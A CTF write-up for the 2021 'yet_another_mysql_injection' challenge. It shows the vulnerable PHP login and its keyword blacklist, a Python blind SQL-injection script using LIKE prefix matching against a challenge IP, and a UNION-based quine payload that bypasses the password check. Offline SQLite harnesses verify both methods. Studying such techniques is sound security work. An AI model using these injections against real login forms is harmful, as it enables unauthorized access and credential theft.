[第五空间 2021]yet_another_mysql_injection
Viewing the page source (F12) reveals a ?source hint; requesting index.php?source returns the script:
```php
<?php
include_once("lib.php");
function alertMes($mes,$url){
    die("<script>alert('{$mes}');location.href='{$url}';</script>");
}
function checkSql($s) {
    if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){
        alertMes('hacker', 'index.php');
    }
}
if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['password']) && $_POST['password'] != '') {
    $username=$_POST['username'];
    $password=$_POST['password'];
    if ($username !== 'admin') {
        alertMes('only admin can login', 'index.php');
    }
    checkSql($password);
    $sql="SELECT password FROM users WHERE username='admin' and password='$password';";
    $user_result=mysqli_query($con,$sql);
    $row = mysqli_fetch_array($user_result);
    if (!$row) {
        alertMes("something wrong",'index.php');
    }
    if ($row['password'] === $password) {
        die($FLAG);
    } else {
        alertMes("wrong password",'index.php');
    }
}
if(isset($_GET['source'])){
    show_source(__FILE__);
    die;
}
?>
```
Method 1
Analysis of checkSql(). The blacklist is a plain case-insensitive substring match, so the in entry also rejects any identifier that contains it (binary, instr, string), and the trailing "\ " rejects the space character. The usual replacements still work:
sleep can be replaced by benchmark()
< and > can be replaced by least() and greatest()
= and in can be replaced by like
substr can be replaced by mid()
the space can be replaced by /**/
The code also shows that the flag is not in the database at all: $FLAG comes from lib.php and is printed only when the stored password is strictly identical (===) to the submitted one. So the password itself has to be recovered. The query gives a row/no-row oracle ("wrong password" when the injected condition matches, "something wrong" when it does not), which makes a character-by-character prefix brute force with LIKE possible. One caveat: LIKE compares case-insensitively under MySQL's default collation, and binary cannot be used to force a case-sensitive match because it contains the blocked token in, so the recovered string may need its letter case adjusted before the final login.
My scripting is fairly weak; this was written by following a writeup.
```python
import requests
import time

# '&' and '%' are dropped from the original charset: '&' trips checkSql() (the
# reply is 'hacker', which the oracle below would mistake for a hit) and '%' is
# a LIKE wildcard that matches any prefix.
char = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/*-+?~#!@'
url = 'http://1.14.71.254:28632/index.php'


def password():
    flag = ''
    while True:
        for i in char:
            # Spaces become /**/ and '=' becomes LIKE to pass checkSql(); '#'
            # comments out the closing quote. A matching prefix returns a row,
            # so the reply is 'wrong password' instead of 'something wrong'.
            payload = {"username": "admin",
                       "password": f"1'or/**/password/**/like/**/'{flag + i}%'#"}
            res = requests.post(url=url, data=payload)
            time.sleep(0.1)
            if "something wrong" not in res.text:
                flag += i
                print(flag)
                break
        else:
            # no character extends the prefix any further: the password is complete
            return flag


if __name__ == '__main__':
    pw = password()
    # log in with the recovered password; $FLAG is printed on an exact match
    res = requests.post(url=url, data={"username": "admin", "password": pw})
    if "NSSCTF" in res.text:
        print(res.text)
    else:
        print("login failed; LIKE is case-insensitive, try other casings of", pw)
```
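The script above depends on two things that are easy to check offline: that each substitution really gets past checkSql(), and that the LIKE prefix oracle behaves as claimed, including its case-insensitivity. The following harness is an added example, not the writeup's code. It ports checkSql() to Python, checks the substitutions against it, and stands in for index.php with SQLite in place of MySQL (an assumption: SQLite's LIKE is also case-insensitive for ASCII, which is the property that matters here, but its = is case-sensitive where MySQL's default collation is not, so a wrong-case login answers "something wrong" in the mock rather than "wrong password"). The password and flag are constructed, and the mock's oracle is the stricter "wrong password" reply, which avoids mistaking a "hacker" reply for a hit.

```python
import itertools
import re
import sqlite3

# Python port of the page's checkSql() blacklist (added example).
# PHP's "\\\$" is a literal '$' and "\ " a literal space.
BLACKLIST = re.compile(
    r"regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|"
    r"extractvalue|floor|substr|&|;|\$|0x|sleep| ", re.I)


def passes_filter(s):
    """True if checkSql() would let the string reach the query."""
    return BLACKLIST.search(s) is None


# Blocked form -> replacement proposed in the writeup.
SUBSTITUTIONS = {
    "sleep(1)": "benchmark(1000000,md5(1))",
    "a<b": "least(a,b)",
    "a>b": "greatest(a,b)",
    "a=b": "a/**/like/**/b",
    "substr(a,1,1)": "mid(a,1,1)",
    "a b": "a/**/b",
}


def check_substitutions():
    """Return {replacement: passes_filter} for every pair whose blocked form is rejected."""
    return {rep: passes_filter(rep) for blocked, rep in SUBSTITUTIONS.items()
            if not passes_filter(blocked)}


# Stand-in for index.php. SECRET and FLAG are constructed, not the challenge's.
SECRET = "S3cr3t"
FLAG = "NSSCTF{constructed}"


def make_target():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES('admin', ?)", (SECRET,))
    return con


def login(con, password):
    """Mirror the PHP branch by branch and return the response text."""
    if not passes_filter(password):
        return "hacker"
    sql = f"SELECT password FROM users WHERE username='admin' and password='{password}'"
    if "#" in sql:
        sql = sql[: sql.rindex("#")]   # MySQL '#' line comment; SQLite has none, so cut there
    row = con.execute(sql).fetchone()
    if row is None:
        return "something wrong"
    return FLAG if row[0] == password else "wrong password"   # PHP's ===


CHARS = "0123456789abcdefghijklmnopqrstuvwxyz"


def brute_force(con):
    """Extend the prefix one character at a time using the row/no-row oracle."""
    found = ""
    while True:
        for c in CHARS:
            probe = f"1'or/**/password/**/like/**/'{found + c}%'#"
            if login(con, probe) == "wrong password":   # a row came back: prefix matches
                found += c
                break
        else:
            return found        # nothing extends the prefix: done


def fix_case(con, found):
    """LIKE matched case-insensitively; try case variants until the strict check passes.
    'binary' cannot be used in the query because it contains the blocked token 'in'."""
    options = [(c.lower(), c.upper()) if c.isalpha() else (c,) for c in found]
    for cand in itertools.product(*options):
        pw = "".join(cand)
        if login(con, pw) == FLAG:
            return pw
    return None


if __name__ == "__main__":
    con = make_target()
    guess = brute_force(con)
    print("LIKE recovered:", guess, "->", login(con, guess))
    print("exact password:", fix_case(con, guess))
```

Against the constructed secret the LIKE loop recovers s3cr3t (all lower case, because the lower-case letters come first in CHARS and LIKE does not distinguish), the strict login with that string fails, and fix_case() finds S3cr3t. On the real target the same case pass would be done with HTTP requests; for a password of n letters it costs at most 2^n logins.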
Method 2
While reading writeups I came across a different trick: the final check only compares the query result with the submitted password, so it can be bypassed by making the two identical.
It is based on this blogger's post. The core idea is nesting REPLACE calls so that the output of the query is the same string as its input, i.e. constructing a quine:
CTFHub_2021-第五空间智能安全大赛-Web-yet_another_mysql_injection(quine注入) - zhengna - 博客园 (cnblogs.com)
```
1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#
```
The quoted string X (1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#) uses " in place of the single quote and . in place of X itself. The injected SELECT computes replace(replace(X, char(34), char(39)), char(46), X): the inner call turns every " into ', the outer call turns every . into X, and the result is exactly the string that was submitted. The first half of the UNION returns nothing (password is not '1'), so mysqli_fetch_array() returns the union row, $row['password'] === $password holds, and die($FLAG) runs. Every token in the payload (union, select, replace, char, /**/, #) is outside the blacklist.
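To make the fixed point concrete, here is an added example (not from the writeup or the referenced post) that builds the payload from its template, evaluates the injected SELECT with SQLite's replace() and char() (assumed to behave like MySQL's for this expression; MySQL's # line comment is cut off by hand because SQLite lacks it), and confirms that the query returns its own input and that the input passes checkSql().

```python
import re
import sqlite3

# The page's checkSql() blacklist, ported to Python (added example).
BLACKLIST = re.compile(
    r"regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|"
    r"extractvalue|floor|substr|&|;|\$|0x|sleep| ", re.I)

# Template T. Two stand-in characters are needed because the final string must
# contain characters that cannot sit literally inside their own quoted copy:
#   '"' (char(34)) stands for the single quote (char(39)) the SQL needs,
#   '.' (char(46)) stands for "the whole template T".
# The injected SELECT computes replace(replace(T, '"', "'"), '.', T), and the
# payload is exactly that value, so the query returns its own input.
TEMPLATE = '1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#'

# The payload quoted in the writeup, for comparison with what build_quine() produces.
WRITEUP_PAYLOAD = """1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#"""


def build_quine(template=TEMPLATE):
    """Apply the two replacements by hand; the result is the string to submit."""
    return template.replace(chr(34), chr(39)).replace(chr(46), template)


def evaluate_injected_select(payload):
    """Run the SELECT the payload injects and return what MySQL would put in
    $row['password']. SQLite stands in for MySQL (assumption: replace() and
    char() agree for this expression)."""
    expr = payload.split("union/**/select/**/", 1)[1]
    if "#" in expr:
        expr = expr[: expr.rindex("#")]   # drop the MySQL '#' comment terminator
    return sqlite3.connect(":memory:").execute("SELECT " + expr).fetchone()[0]


def is_quine(payload):
    """True when the payload survives checkSql() and the query returns it unchanged,
    which is what $row['password'] === $password requires."""
    return (BLACKLIST.search(payload) is None
            and evaluate_injected_select(payload) == payload)


if __name__ == "__main__":
    p = build_quine()
    print("matches writeup payload:", p == WRITEUP_PAYLOAD)
    print("is a quine:", is_quine(p))
    # A union that returns a fixed string passes the filter but is not a quine:
    print("plain union is a quine:", is_quine("1'/**/union/**/select/**/'abc'#"))
```

The template can be varied (for example a different leading value than 1) as long as it contains no ' or . other than the placeholders and no blacklisted token; build_quine() then produces the matching payload and is_quine() checks it before it is ever sent.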
From: https://www.cnblogs.com/0xo0Kerk/p/17204615.html